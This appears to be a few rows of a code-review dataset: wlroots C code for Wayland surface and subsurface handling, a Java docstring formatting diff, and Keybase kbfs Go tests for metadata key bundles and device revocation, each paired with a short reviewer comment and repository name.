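		// describes the full damage in its own coordinate space.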
// Surface to buffer damage
pixman_region32_copy(&buffer_damage, &state->surface_damage);
wlr_region_transform(&buffer_damage, &buffer_damage,
wlr_output_transform_invert(state->transform),
state->width, state->height);
wlr_region_scale(&buffer_damage, &buffer_damage, state->scale);
// Buffer to surface damage
pixman_region32_copy(&surface_damage, &state->buffer_damage);
wlr_region_transform(&surface_damage, &surface_damage, state->transform,
state->buffer_width, state->buffer_height);
wlr_region_scale(&surface_damage, &surface_damage, 1.0f/state->scale);
pixman_region32_union(&state->buffer_damage, &state->buffer_damage,
&buffer_damage);
pixman_region32_union(&state->surface_damage, &state->surface_damage,
&surface_damage);
pixman_region32_fini(&buffer_damage);
pixman_region32_fini(&surface_damage);
}
if ((next->invalid & WLR_SURFACE_INVALID_OPAQUE_REGION)) {
// TODO: process buffer
pixman_region32_clear(&next->opaque);
}
if ((next->invalid & WLR_SURFACE_INVALID_INPUT_REGION)) {
// TODO: process buffer
pixman_region32_copy(&state->input, &next->input);
}
if ((next->invalid & WLR_SURFACE_INVALID_SUBSURFACE_POSITION)) {
// Subsurface has moved
int dx = state->subsurface_position.x - next->subsurface_position.x;
int dy = state->subsurface_position.y - next->subsurface_position.y;
state->subsurface_position.x = next->subsurface_position.x;
state->subsurface_position.y = next->subsurface_position.y;
next->subsurface_position.x = 0;
next->subsurface_position.y = 0;
if (dx != 0 || dy != 0) {
pixman_region32_union_rect(&state->surface_damage,
&state->surface_damage, dx, dy, oldw, oldh);
pixman_region32_union_rect(&state->surface_damage,
&state->surface_damage, 0, 0, state->width, state->height);
}
}
if ((next->invalid & WLR_SURFACE_INVALID_FRAME_CALLBACK_LIST)) {
wl_list_insert_list(&state->frame_callback_list,
&next->frame_callback_list);
wl_list_init(&next->frame_callback_list);
}
state->invalid |= next->invalid;
next->invalid = 0;
}
static void surface_damage_subsurfaces(struct wlr_subsurface *subsurface) {
// XXX: This is probably the wrong way to do it, because this damage should
// come from the client, but weston doesn't do it correctly either and it
// seems to work ok. See the comment on weston_surface_damage for more info
// about a better approach.
struct wlr_surface *surface = subsurface->surface;
pixman_region32_union_rect(&surface->current->surface_damage,
&surface->current->surface_damage,
0, 0, surface->current->width,
surface->current->height);
subsurface->reordered = false;
struct wlr_subsurface *child;
wl_list_for_each(child, &subsurface->surface->subsurfaces, parent_link) {
surface_damage_subsurfaces(child);
}
}
static void surface_apply_damage(struct wlr_surface *surface,
bool invalid_buffer, bool reupload_buffer) {
struct wl_resource *resource = surface->current->buffer;
if (resource == NULL) {
return;
}
struct wl_shm_buffer *buf = wl_shm_buffer_get(resource);
if (buf != NULL) {
wl_shm_buffer_begin_access(buf);
enum wl_shm_format fmt = wl_shm_buffer_get_format(buf);
int32_t stride = wl_shm_buffer_get_stride(buf);
int32_t width = wl_shm_buffer_get_width(buf);
int32_t height = wl_shm_buffer_get_height(buf);
void *data = wl_shm_buffer_get_data(buf);
if (surface->texture == NULL || reupload_buffer) {
wlr_texture_destroy(surface->texture);
surface->texture = wlr_texture_from_pixels(surface->renderer, fmt,
stride, width, height, data);
} else {
pixman_region32_t damage;
pixman_region32_init(&damage);
pixman_region32_copy(&damage, &surface->current->buffer_damage);
pixman_region32_intersect_rect(&damage, &damage, 0, 0,
surface->current->buffer_width,
surface->current->buffer_height);
int n;
pixman_box32_t *rects = pixman_region32_rectangles(&damage, &n);
for (int i = 0; i < n; ++i) {
pixman_box32_t *r = &rects[i];
if (!wlr_texture_write_pixels(surface->texture, fmt, stride,
r->x2 - r->x1, r->y2 - r->y1, r->x1, r->y1,
r->x1, r->y1, data)) {
break;
}
}
pixman_region32_fini(&damage);
}
wl_shm_buffer_end_access(buf);
} else if (invalid_buffer || reupload_buffer) {
wlr_texture_destroy(surface->texture);
if (wlr_renderer_resource_is_wl_drm_buffer(surface->renderer, resource)) {
surface->texture =
wlr_texture_from_wl_drm(surface->renderer, resource);
} else if (wlr_dmabuf_resource_is_buffer(resource)) {
struct wlr_dmabuf_buffer *dmabuf =
wlr_dmabuf_buffer_from_buffer_resource(resource);
surface->texture =
wlr_texture_from_dmabuf(surface->renderer, &dmabuf->attributes);
} else {
surface->texture = NULL;
wlr_log(L_ERROR, "Unknown buffer handle attached");
}
}
surface_state_release_buffer(surface->current);
}
static void surface_commit_pending(struct wlr_surface *surface) {
int32_t oldw = surface->current->buffer_width;
int32_t oldh = surface->current->buffer_height;
bool invalid_buffer = surface->pending->invalid & WLR_SURFACE_INVALID_BUFFER;
bool null_buffer_commit = invalid_buffer && surface->pending->buffer == NULL;
surface_move_state(surface, surface->pending, surface->current);
if (null_buffer_commit) {
wlr_texture_destroy(surface->texture);
surface->texture = NULL;
}
bool reupload_buffer = oldw != surface->current->buffer_width ||
oldh != surface->current->buffer_height;
surface_apply_damage(surface, invalid_buffer, reupload_buffer);
// commit subsurface order
struct wlr_subsurface *subsurface;
wl_list_for_each_reverse(subsurface, &surface->subsurface_pending_list,
parent_pending_link) {
wl_list_remove(&subsurface->parent_link);
wl_list_insert(&surface->subsurfaces, &subsurface->parent_link);
if (subsurface->reordered) {
// TODO: damage all the subsurfaces
surface_damage_subsurfaces(subsurface);
}
}
if (surface->role_committed) {
surface->role_committed(surface, surface->role_data);
}
// TODO: add the invalid bitfield to this callback
wlr_signal_emit_safe(&surface->events.commit, surface);
pixman_region32_clear(&surface->current->surface_damage);
pixman_region32_clear(&surface->current->buffer_damage);
}
static bool subsurface_is_synchronized(struct wlr_subsurface *subsurface) {
while (1) {
if (subsurface->synchronized) {
return true;
}
if (!subsurface->parent) {
return false;
}
if (!wlr_surface_is_subsurface(subsurface->parent)) {
break;
}
subsurface = wlr_subsurface_from_surface(subsurface->parent);
}
return false;
}
/**
* Recursive function to commit the effectively synchronized children.
*/
static void subsurface_parent_commit(struct wlr_subsurface *subsurface,
bool synchronized) {
struct wlr_surface *surface = subsurface->surface;
if (synchronized || subsurface->synchronized) {
if (subsurface->has_cache) {
surface_move_state(surface, subsurface->cached, surface->pending);
surface_commit_pending(surface);
subsurface->has_cache = false;
subsurface->cached->invalid = 0;
}
struct wlr_subsurface *tmp;
wl_list_for_each(tmp, &surface->subsurfaces, parent_link) {
subsurface_parent_commit(tmp, true);
}
}
}
static void subsurface_commit(struct wlr_subsurface *subsurface) {
struct wlr_surface *surface = subsurface->surface;
if (subsurface_is_synchronized(subsurface)) {
surface_move_state(surface, surface->pending, subsurface->cached);
subsurface->has_cache = true;
} else {
if (subsurface->has_cache) {
surface_move_state(surface, subsurface->cached, surface->pending);
surface_commit_pending(surface);
subsurface->has_cache = false;
} else {
surface_commit_pending(surface);
}
struct wlr_subsurface *tmp;
wl_list_for_each(tmp, &surface->subsurfaces, parent_link) {
subsurface_parent_commit(tmp, false);
}
}
}
static void surface_commit(struct wl_client *client,
struct wl_resource *resource) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
if (wlr_surface_is_subsurface(surface)) {
struct wlr_subsurface *subsurface =
wlr_subsurface_from_surface(surface);
subsurface_commit(subsurface);
return;
}
surface_commit_pending(surface);
struct wlr_subsurface *tmp;
wl_list_for_each(tmp, &surface->subsurfaces, parent_link) {
subsurface_parent_commit(tmp, false);
}
}
static void surface_set_buffer_transform(struct wl_client *client,
struct wl_resource *resource, int transform) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
surface->pending->invalid |= WLR_SURFACE_INVALID_TRANSFORM;
surface->pending->transform = transform;
}
static void surface_set_buffer_scale(struct wl_client *client,
struct wl_resource *resource,
int32_t scale) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
surface->pending->invalid |= WLR_SURFACE_INVALID_SCALE;
surface->pending->scale = scale;
}
static void surface_damage_buffer(struct wl_client *client,
struct wl_resource *resource,
int32_t x, int32_t y, int32_t width,
int32_t height) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
if (width < 0 || height < 0) {
return;
}
surface->pending->invalid |= WLR_SURFACE_INVALID_BUFFER_DAMAGE;
pixman_region32_union_rect(&surface->pending->buffer_damage,
&surface->pending->buffer_damage,
x, y, width, height);
}
static const struct wl_surface_interface surface_interface = {
.destroy = surface_destroy,
.attach = surface_attach,
.damage = surface_damage,
.frame = surface_frame,
.set_opaque_region = surface_set_opaque_region,
.set_input_region = surface_set_input_region,
.commit = surface_commit,
.set_buffer_transform = surface_set_buffer_transform,
.set_buffer_scale = surface_set_buffer_scale,
.damage_buffer = surface_damage_buffer
};
struct wlr_surface *wlr_surface_from_resource(struct wl_resource *resource) {
assert(wl_resource_instance_of(resource, &wl_surface_interface,
&surface_interface));
return wl_resource_get_user_data(resource);
}
static struct wlr_surface_state *surface_state_create(void) {
struct wlr_surface_state *state =
calloc(1, sizeof(struct wlr_surface_state));
if (state == NULL) {
return NULL;
}
state->scale = 1;
state->transform = WL_OUTPUT_TRANSFORM_NORMAL;
wl_list_init(&state->frame_callback_list);
pixman_region32_init(&state->surface_damage);
pixman_region32_init(&state->buffer_damage);
pixman_region32_init(&state->opaque);
pixman_region32_init_rect(&state->input,
INT32_MIN, INT32_MIN, UINT32_MAX, UINT32_MAX);
return state;
}
static void surface_state_destroy(struct wlr_surface_state *state) {
surface_state_reset_buffer(state);
struct wlr_frame_callback *cb, *tmp;
wl_list_for_each_safe(cb, tmp, &state->frame_callback_list, link) {
wl_resource_destroy(cb->resource);
}
pixman_region32_fini(&state->surface_damage);
pixman_region32_fini(&state->buffer_damage);
pixman_region32_fini(&state->opaque);
pixman_region32_fini(&state->input);
free(state);
}
static void subsurface_destroy(struct wlr_subsurface *subsurface) {
if (subsurface == NULL) {
return;
}
wlr_signal_emit_safe(&subsurface->events.destroy, subsurface);
wl_list_remove(&subsurface->surface_destroy.link);
surface_state_destroy(subsurface->cached);
if (subsurface->parent) {
wl_list_remove(&subsurface->parent_link);
wl_list_remove(&subsurface->parent_pending_link);
wl_list_remove(&subsurface->parent_destroy.link);
}
wl_resource_set_user_data(subsurface->resource, NULL);
if (subsurface->surface) {
subsurface->surface->role_data = NULL;
}
free(subsurface);
}
static void surface_handle_resource_destroy(struct wl_resource *resource) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
wlr_signal_emit_safe(&surface->events.destroy, surface);
wl_list_remove(wl_resource_get_link(surface->resource));
wl_list_remove(&surface->renderer_destroy.link);
wlr_texture_destroy(surface->texture);
surface_state_destroy(surface->pending);
surface_state_destroy(surface->current);
free(surface);
}
static void surface_handle_renderer_destroy(struct wl_listener *listener,
void *data) {
struct wlr_surface *surface =
wl_container_of(listener, surface, renderer_destroy);
wl_resource_destroy(surface->resource);
}
struct wlr_surface *wlr_surface_create(struct wl_client *client,
uint32_t version, uint32_t id, struct wlr_renderer *renderer,
struct wl_list *resource_list) {
assert(version <= SURFACE_VERSION);
struct wlr_surface *surface = calloc(1, sizeof(struct wlr_surface));
if (!surface) {
wl_client_post_no_memory(client);
return NULL;
}
surface->resource = wl_resource_create(client, &wl_surface_interface,
version, id);
if (surface->resource == NULL) {
free(surface);
wl_client_post_no_memory(client);
return NULL;
}
wl_resource_set_implementation(surface->resource, &surface_interface,
surface, surface_handle_resource_destroy);
wlr_log(L_DEBUG, "New wlr_surface %p (res %p)", surface, surface->resource);
surface->renderer = renderer;
surface->current = surface_state_create();
surface->pending = surface_state_create();
wl_signal_init(&surface->events.commit);
wl_signal_init(&surface->events.destroy);
wl_signal_init(&surface->events.new_subsurface);
wl_list_init(&surface->subsurfaces);
wl_list_init(&surface->subsurface_pending_list);
wl_signal_add(&renderer->events.destroy, &surface->renderer_destroy);
surface->renderer_destroy.notify = surface_handle_renderer_destroy;
struct wl_list *resource_link = wl_resource_get_link(surface->resource);
if (resource_list != NULL) {
wl_list_insert(resource_list, resource_link);
} else {
wl_list_init(resource_link);
}
return surface;
}
bool wlr_surface_has_buffer(struct wlr_surface *surface) {
return surface->texture != NULL;
}
int wlr_surface_set_role(struct wlr_surface *surface, const char *role,
struct wl_resource *error_resource, uint32_t error_code) {
assert(role);
if (surface->role == NULL ||
surface->role == role ||
strcmp(surface->role, role) == 0) {
surface->role = role;
return 0;
}
wl_resource_post_error(error_resource, error_code,
"Cannot assign role %s to wl_surface@%d, already has role %s\n",
role,
wl_resource_get_id(surface->resource),
surface->role);
return -1;
}
static const struct wl_subsurface_interface subsurface_implementation;
static struct wlr_subsurface *subsurface_from_resource(
struct wl_resource *resource) {
assert(wl_resource_instance_of(resource, &wl_subsurface_interface,
&subsurface_implementation));
return wl_resource_get_user_data(resource);
}
static void subsurface_resource_destroy(struct wl_resource *resource) {
struct wlr_subsurface *subsurface = subsurface_from_resource(resource);
wl_list_remove(wl_resource_get_link(resource));
subsurface_destroy(subsurface);
}
static void subsurface_handle_destroy(struct wl_client *client,
struct wl_resource *resource) {
wl_resource_destroy(resource);
}
static void subsurface_handle_set_position(struct wl_client *client,
struct wl_resource *resource, int32_t x, int32_t y) {
struct wlr_subsurface *subsurface = subsurface_from_resource(resource);
if (subsurface == NULL) {
return;
}
struct wlr_surface *surface = subsurface->surface;
surface->pending->invalid |= WLR_SURFACE_INVALID_SUBSURFACE_POSITION;
surface->pending->subsurface_position.x = x;
surface->pending->subsurface_position.y = y;
}
static struct wlr_subsurface *subsurface_find_sibling(
struct wlr_subsurface *subsurface, struct wlr_surface *surface) {
struct wlr_surface *parent = subsurface->parent;
struct wlr_subsurface *sibling;
wl_list_for_each(sibling, &parent->subsurfaces, parent_link) {
if (sibling->surface == surface && sibling != subsurface) {
return sibling;
}
}
return NULL;
}
static void subsurface_handle_place_above(struct wl_client *client,
struct wl_resource *resource, struct wl_resource *sibling_resource) {
struct wlr_subsurface *subsurface = subsurface_from_resource(resource);
if (subsurface == NULL) {
return;
}
struct wlr_surface *sibling_surface =
wlr_surface_from_resource(sibling_resource);
struct wlr_subsurface *sibling =
subsurface_find_sibling(subsurface, sibling_surface);
if (!sibling) {
wl_resource_post_error(subsurface->resource,
WL_SUBSURFACE_ERROR_BAD_SURFACE,
"%s: wl_surface@%d is not a parent or sibling",
"place_above", wl_resource_get_id(sibling_surface->resource));
return;
}
wl_list_remove(&subsurface->parent_pending_link);
wl_list_insert(sibling->parent_pending_link.prev,
&subsurface->parent_pending_link);
subsurface->reordered = true;
}
static void subsurface_handle_place_below(struct wl_client *client,
struct wl_resource *resource, struct wl_resource *sibling_resource) {
struct wlr_subsurface *subsurface = subsurface_from_resource(resource);
if (subsurface == NULL) {
return;
}
struct wlr_surface *sibling_surface =
wlr_surface_from_resource(sibling_resource);
struct wlr_subsurface *sibling =
subsurface_find_sibling(subsurface, sibling_surface);
if (!sibling) {
wl_resource_post_error(subsurface->resource,
WL_SUBSURFACE_ERROR_BAD_SURFACE,
"%s: wl_surface@%d is not a parent or sibling",
"place_below", wl_resource_get_id(sibling_surface->resource));
return;
}
wl_list_remove(&subsurface->parent_pending_link);
wl_list_insert(&sibling->parent_pending_link,
&subsurface->parent_pending_link);
subsurface->reordered = true;
}
static void subsurface_handle_set_sync(struct wl_client *client,
struct wl_resource *resource) {
struct wlr_subsurface *subsurface = subsurface_from_resource(resource);
if (subsurface == NULL) {
return;
}
subsurface->synchronized = true;
}
static void subsurface_handle_set_desync(struct wl_client *client,
struct wl_resource *resource) {
struct wlr_subsurface *subsurface = subsurface_from_resource(resource);
if (subsurface == NULL) {
return;
}
if (subsurface->synchronized) {
subsurface->synchronized = false;
if (!subsurface_is_synchronized(subsurface)) {
// TODO: do a synchronized commit to flush the cache
subsurface_parent_commit(subsurface, true);
}
}
}
static const struct wl_subsurface_interface subsurface_implementation = {
.destroy = subsurface_handle_destroy,
.set_position = subsurface_handle_set_position,
.place_above = subsurface_handle_place_above,
.place_below = subsurface_handle_place_below,
.set_sync = subsurface_handle_set_sync,
.set_desync = subsurface_handle_set_desync,
};
static void subsurface_handle_parent_destroy(struct wl_listener *listener,
void *data) {
struct wlr_subsurface *subsurface =
wl_container_of(listener, subsurface, parent_destroy);
wl_list_remove(&subsurface->parent_link);
wl_list_remove(&subsurface->parent_pending_link);
wl_list_remove(&subsurface->parent_destroy.link);
subsurface->parent = NULL;
}
static void subsurface_handle_surface_destroy(struct wl_listener *listener,
void *data) {
struct wlr_subsurface *subsurface =
wl_container_of(listener, subsurface, surface_destroy);
subsurface_destroy(subsurface);
}
struct wlr_subsurface *wlr_subsurface_create(struct wlr_surface *surface,
struct wlr_surface *parent, uint32_t version, uint32_t id,
struct wl_list *resource_list) {
assert(version <= SUBSURFACE_VERSION);
struct wl_client *client = wl_resource_get_client(surface->resource);
struct wlr_subsurface *subsurface =
calloc(1, sizeof(struct wlr_subsurface));
if (!subsurface) {
wl_client_post_no_memory(client);
return NULL;
}
subsurface->cached = surface_state_create();
if (subsurface->cached == NULL) {
free(subsurface);
wl_client_post_no_memory(client);
return NULL;
}
subsurface->synchronized = true;
subsurface->surface = surface;
subsurface->resource =
wl_resource_create(client, &wl_subsurface_interface, version, id);
if (subsurface->resource == NULL) {
surface_state_destroy(subsurface->cached);
free(subsurface);
wl_client_post_no_memory(client);
return NULL;
}
wl_resource_set_implementation(subsurface->resource,
&subsurface_implementation, subsurface,
subsurface_resource_destroy);
wl_signal_init(&subsurface->events.destroy);
wl_signal_add(&surface->events.destroy, &subsurface->surface_destroy);
subsurface->surface_destroy.notify = subsurface_handle_surface_destroy;
// link parent
subsurface->parent = parent;
wl_signal_add(&parent->events.destroy, &subsurface->parent_destroy);
subsurface->parent_destroy.notify = subsurface_handle_parent_destroy;
wl_list_insert(&parent->subsurfaces, &subsurface->parent_link);
wl_list_insert(&parent->subsurface_pending_list,
&subsurface->parent_pending_link);
surface->role_data = subsurface;
struct wl_list *resource_link = wl_resource_get_link(subsurface->resource);
if (resource_list != NULL) {
wl_list_insert(resource_list, resource_link);
} else {
wl_list_init(resource_link);
}
wlr_signal_emit_safe(&parent->events.new_subsurface, subsurface);
return subsurface;
}
struct wlr_surface *wlr_surface_get_root_surface(struct wlr_surface *surface) {
while (wlr_surface_is_subsurface(surface)) {
struct wlr_subsurface *subsurface =
wlr_subsurface_from_surface(surface);
surface = subsurface->parent;
}
return surface;
}
bool wlr_surface_point_accepts_input(struct wlr_surface *surface,
double sx, double sy) {
return sx >= 0 && sx <= surface->current->width &&
sy >= 0 && sy <= surface->current->height &&
pixman_region32_contains_point(&surface->current->input, sx, sy, NULL);
}
struct wlr_surface *wlr_surface_surface_at(struct wlr_surface *surface,
double sx, double sy, double *sub_x, double *sub_y) {
struct wlr_subsurface *subsurface;
wl_list_for_each(subsurface, &surface->subsurfaces, parent_link) {
double _sub_x = subsurface->surface->current->subsurface_position.x;
double _sub_y = subsurface->surface->current->subsurface_position.y;
struct wlr_surface *sub = wlr_surface_surface_at(subsurface->surface,
sx - _sub_x, sy - _sub_y, sub_x, sub_y);
if (sub != NULL) {
return sub;
}
}
if (wlr_surface_point_accepts_input(surface, sx, sy)) {
*sub_x = sx;
*sub_y = sy;
return surface;
}
return NULL;
}
void wlr_surface_send_enter(struct wlr_surface *surface,
struct wlr_output *output) {
struct wl_client *client = wl_resource_get_client(surface->resource);
struct wl_resource *resource;
wl_resource_for_each(resource, &output->wl_resources) {
if (client == wl_resource_get_client(resource)) {
wl_surface_send_enter(surface->resource, resource);
}
}
}
void wlr_surface_send_leave(struct wlr_surface *surface,
struct wlr_output *output) {
struct wl_client *client = wl_resource_get_client(surface->resource);
struct wl_resource *resource;
wl_resource_for_each(resource, &output->wl_resources) {
if (client == wl_resource_get_client(resource)) {
wl_surface_send_leave(surface->resource, resource);
}
}
}
static inline int64_t timespec_to_msec(const struct timespec *a) {
return (int64_t)a->tv_sec * 1000 + a->tv_nsec / 1000000;
}
void wlr_surface_send_frame_done(struct wlr_surface *surface,
const struct timespec *when) {
struct wlr_frame_callback *cb, *cnext;
wl_list_for_each_safe(cb, cnext, &surface->current->frame_callback_list,
link) {
wl_callback_send_done(cb->resource, timespec_to_msec(when));
wl_resource_destroy(cb->resource);
}
}
void wlr_surface_set_role_committed(struct wlr_surface *surface,
void (*role_committed)(struct wlr_surface *surface, void *role_data),
void *role_data) {
surface->role_committed = role_committed;
surface->role_data = role_data;
}
static void surface_for_each_surface(struct wlr_surface *surface, int x, int y,
wlr_surface_iterator_func_t iterator, void *user_data) {
iterator(surface, x, y, user_data);
struct wlr_subsurface *subsurface;
wl_list_for_each(subsurface, &surface->subsurfaces, parent_link) {
struct wlr_surface_state *state = subsurface->surface->current;
int sx = state->subsurface_position.x;
int sy = state->subsurface_position.y;
surface_for_each_surface(subsurface->surface, x + sx, y + sy,
iterator, user_data);
}
}
void wlr_surface_for_each_surface(struct wlr_surface *surface,
wlr_surface_iterator_func_t iterator, void *user_data) {
surface_for_each_surface(surface, 0, 0, iterator, user_data);
}
struct bound_acc {
int32_t min_x, min_y;
int32_t max_x, max_y;
};
static void handle_bounding_box_surface(struct wlr_surface *surface,
int x, int y, void *data) {
struct bound_acc *acc = data;
acc->min_x = min(x, acc->min_x);
acc->min_y = min(y, acc->min_y);
acc->max_x = max(x + surface->current->width, acc->max_x);
acc->max_y = max(y + surface->current->height, acc->max_y);
}
void wlr_surface_get_extends(struct wlr_surface *surface, struct wlr_box *box) {
struct bound_acc acc = {
.min_x = 0,
.min_y = 0,
.max_x = surface->current->width,
.max_y = surface->current->height,
};
wlr_surface_for_each_surface(surface, handle_bounding_box_surface, &acc);
box->x = acc.min_x;
box->y = acc.min_y;
box->width = acc.max_x - acc.min_x;
box->height = acc.max_y - acc.min_y;
}
| 1 | 11,733 | Wait, I think the `subsurface_handle_place_above` code was correct before. `place_above` means "place it above in rendering order" right? | swaywm-wlroots | c |
@@ -4,9 +4,10 @@ public class Test {
/**
* Docstring that looks like a list:
*
- * <p>1. hey 2. there
+ * 1. hey
+ * 2. there
*
- * <p>with blank line.
+ * with blank line.
*/
Void test() {
/* | 1 | package test;
public class Test {
/**
* Docstring that looks like a list:
*
* <p>1. hey 2. there
*
* <p>with blank line.
*/
Void test() {
/*
Normal comment
with blank line.
*/
}
}
| 1 | 8,796 | why did this change? | palantir-gradle-baseline | java |
@@ -15,12 +15,13 @@ import (
)
func TestBareRootMetadataVersionV3(t *testing.T) {
- tlfID := tlf.FakeID(1, false)
+ tlfID := tlf.FakeID(1, tlf.Private)
// All V3 objects should have SegregatedKeyBundlesVer.
uid := keybase1.MakeTestUID(1)
- bh, err := tlf.MakeHandle([]keybase1.UID{uid}, nil, nil, nil, nil)
+ bh, err := tlf.MakeHandle(
+ []keybase1.UserOrTeamID{uid.AsUserOrTeam()}, nil, nil, nil, nil)
require.NoError(t, err)
rmd, err := MakeInitialBareRootMetadataV3(tlfID, bh) | 1 | // Copyright 2016 Keybase Inc. All rights reserved.
// Use of this source code is governed by a BSD
// license that can be found in the LICENSE file.
package libkbfs
import (
"testing"
"github.com/keybase/client/go/protocol/keybase1"
"github.com/keybase/kbfs/kbfscodec"
"github.com/keybase/kbfs/kbfscrypto"
"github.com/keybase/kbfs/tlf"
"github.com/stretchr/testify/require"
)
func TestBareRootMetadataVersionV3(t *testing.T) {
tlfID := tlf.FakeID(1, false)
// All V3 objects should have SegregatedKeyBundlesVer.
uid := keybase1.MakeTestUID(1)
bh, err := tlf.MakeHandle([]keybase1.UID{uid}, nil, nil, nil, nil)
require.NoError(t, err)
rmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
require.Equal(t, SegregatedKeyBundlesVer, rmd.Version())
}
func TestRootMetadataV3ExtraNew(t *testing.T) {
tlfID := tlf.FakeID(1, false)
uid := keybase1.MakeTestUID(1)
bh, err := tlf.MakeHandle([]keybase1.UID{uid}, nil, nil, nil, nil)
require.NoError(t, err)
rmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
codec := kbfscodec.NewMsgpack()
crypto := MakeCryptoCommon(codec)
extra := FakeInitialRekey(rmd, bh, kbfscrypto.TLFPublicKey{})
extraV3, ok := extra.(*ExtraMetadataV3)
require.True(t, ok)
require.True(t, extraV3.wkbNew)
require.True(t, extraV3.rkbNew)
err = rmd.FinalizeRekey(crypto, extra)
require.NoError(t, err)
require.True(t, extraV3.wkbNew)
require.True(t, extraV3.rkbNew)
_, extraCopy, err := rmd.MakeSuccessorCopy(
codec, nil, extra, -1, nil, true)
require.NoError(t, err)
extraV3Copy, ok := extraCopy.(*ExtraMetadataV3)
require.True(t, ok)
require.False(t, extraV3Copy.wkbNew)
require.False(t, extraV3Copy.rkbNew)
}
func TestIsValidRekeyRequestBasicV3(t *testing.T) {
tlfID := tlf.FakeID(1, false)
uid := keybase1.MakeTestUID(1)
bh, err := tlf.MakeHandle([]keybase1.UID{uid}, nil, nil, nil, nil)
require.NoError(t, err)
codec := kbfscodec.NewMsgpack()
brmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
extra := FakeInitialRekey(brmd, bh, kbfscrypto.TLFPublicKey{})
newBrmd, err := brmd.DeepCopy(codec)
require.NoError(t, err)
newExtra, err := extra.DeepCopy(codec)
require.NoError(t, err)
ok, err := newBrmd.IsValidRekeyRequest(
codec, brmd, newBrmd.LastModifyingWriter(), extra, newExtra)
require.NoError(t, err)
// Should fail because the copy bit is unset.
require.False(t, ok)
// Set the copy bit; note the writer metadata is the same.
newBrmd.SetWriterMetadataCopiedBit()
// There's no internal signature to compare, so this should
// then work.
ok, err = newBrmd.IsValidRekeyRequest(
codec, brmd, newBrmd.LastModifyingWriter(), extra, newExtra)
require.NoError(t, err)
require.True(t, ok)
}
func TestBareRootMetadataPublicVersionV3(t *testing.T) {
tlfID := tlf.FakeID(1, true)
uid := keybase1.MakeTestUID(1)
bh, err := tlf.MakeHandle([]keybase1.UID{uid}, []keybase1.UID{keybase1.PublicUID}, nil, nil, nil)
require.NoError(t, err)
rmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
require.Equal(t, SegregatedKeyBundlesVer, rmd.Version())
	bh2, err := rmd.MakeBareTlfHandle(nil)
	require.NoError(t, err)
	require.Equal(t, bh, bh2)
}
func TestRevokeRemovedDevicesV3(t *testing.T) {
uid1 := keybase1.MakeTestUID(0x1)
uid2 := keybase1.MakeTestUID(0x2)
uid3 := keybase1.MakeTestUID(0x3)
key1 := kbfscrypto.MakeFakeCryptPublicKeyOrBust("key1")
key2 := kbfscrypto.MakeFakeCryptPublicKeyOrBust("key2")
key3 := kbfscrypto.MakeFakeCryptPublicKeyOrBust("key3")
half1a := kbfscrypto.MakeTLFCryptKeyServerHalf([32]byte{0x1})
half2a := kbfscrypto.MakeTLFCryptKeyServerHalf([32]byte{0x3})
half3a := kbfscrypto.MakeTLFCryptKeyServerHalf([32]byte{0x5})
codec := kbfscodec.NewMsgpack()
crypto := MakeCryptoCommon(codec)
id1a, err := crypto.GetTLFCryptKeyServerHalfID(uid1, key1, half1a)
require.NoError(t, err)
id2a, err := crypto.GetTLFCryptKeyServerHalfID(uid2, key2, half2a)
require.NoError(t, err)
id3a, err := crypto.GetTLFCryptKeyServerHalfID(uid3, key3, half3a)
require.NoError(t, err)
tlfID := tlf.FakeID(1, false)
bh, err := tlf.MakeHandle(
[]keybase1.UID{uid1, uid2}, []keybase1.UID{uid3}, nil, nil, nil)
require.NoError(t, err)
brmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
extra := FakeInitialRekey(brmd, bh, kbfscrypto.TLFPublicKey{})
wkb, rkb, err := brmd.getTLFKeyBundles(extra)
require.NoError(t, err)
*wkb = TLFWriterKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid1: DeviceKeyInfoMapV3{
key1: TLFCryptKeyInfo{
ServerHalfID: id1a,
EPubKeyIndex: 0,
},
},
uid2: DeviceKeyInfoMapV3{
key2: TLFCryptKeyInfo{
ServerHalfID: id2a,
EPubKeyIndex: 0,
},
},
},
}
*rkb = TLFReaderKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid3: DeviceKeyInfoMapV3{
key3: TLFCryptKeyInfo{
ServerHalfID: id3a,
EPubKeyIndex: 0,
},
},
},
}
updatedWriterKeys := UserDevicePublicKeys{
uid1: {key1: true},
}
updatedReaderKeys := UserDevicePublicKeys{
uid3: {key3: true},
}
removalInfo, err := brmd.RevokeRemovedDevices(
updatedWriterKeys, updatedReaderKeys, extra)
require.NoError(t, err)
require.Equal(t, ServerHalfRemovalInfo{
uid2: userServerHalfRemovalInfo{
userRemoved: true,
deviceServerHalfIDs: deviceServerHalfRemovalInfo{
key2: []TLFCryptKeyServerHalfID{id2a},
},
},
}, removalInfo)
expectedWKB := TLFWriterKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid1: DeviceKeyInfoMapV3{
key1: TLFCryptKeyInfo{
ServerHalfID: id1a,
EPubKeyIndex: 0,
},
},
},
}
require.Equal(t, expectedWKB, *wkb)
expectedRKB := TLFReaderKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid3: DeviceKeyInfoMapV3{
key3: TLFCryptKeyInfo{
ServerHalfID: id3a,
EPubKeyIndex: 0,
},
},
},
}
require.Equal(t, expectedRKB, *rkb)
}
// TestRevokeLastDeviceV3 checks behavior of RevokeRemovedDevices with
// respect to removing the last device of a user vs. removing the user
// completely.
func TestRevokeLastDeviceV3(t *testing.T) {
uid1 := keybase1.MakeTestUID(0x1)
uid2 := keybase1.MakeTestUID(0x2)
uid3 := keybase1.MakeTestUID(0x3)
uid4 := keybase1.MakeTestUID(0x4)
key1 := kbfscrypto.MakeFakeCryptPublicKeyOrBust("key1")
key2 := kbfscrypto.MakeFakeCryptPublicKeyOrBust("key2")
half1 := kbfscrypto.MakeTLFCryptKeyServerHalf([32]byte{0x1})
half2 := kbfscrypto.MakeTLFCryptKeyServerHalf([32]byte{0x2})
codec := kbfscodec.NewMsgpack()
